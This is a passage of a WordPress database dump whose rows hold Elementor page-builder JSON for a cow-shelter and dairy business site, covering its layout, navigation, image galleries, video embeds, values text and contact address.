here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9091,1559,'_elementor_page_assets','a:0:{}'),(9093,1560,'_elementor_edit_mode','builder'),(9094,1560,'_elementor_template_type','wp-page'),(9095,1560,'_elementor_version','3.7.8'),(9096,1560,'_wp_page_template','elementor_canvas'),(9097,1560,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9098,1560,'_elementor_page_assets','a:0:{}'),(9101,1561,'_elementor_edit_mode','builder'),(9102,1561,'_elementor_template_type','wp-page'),(9103,1561,'_elementor_version','3.7.8'),(9104,1561,'_wp_page_template','elementor_canvas'),(9105,1561,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"593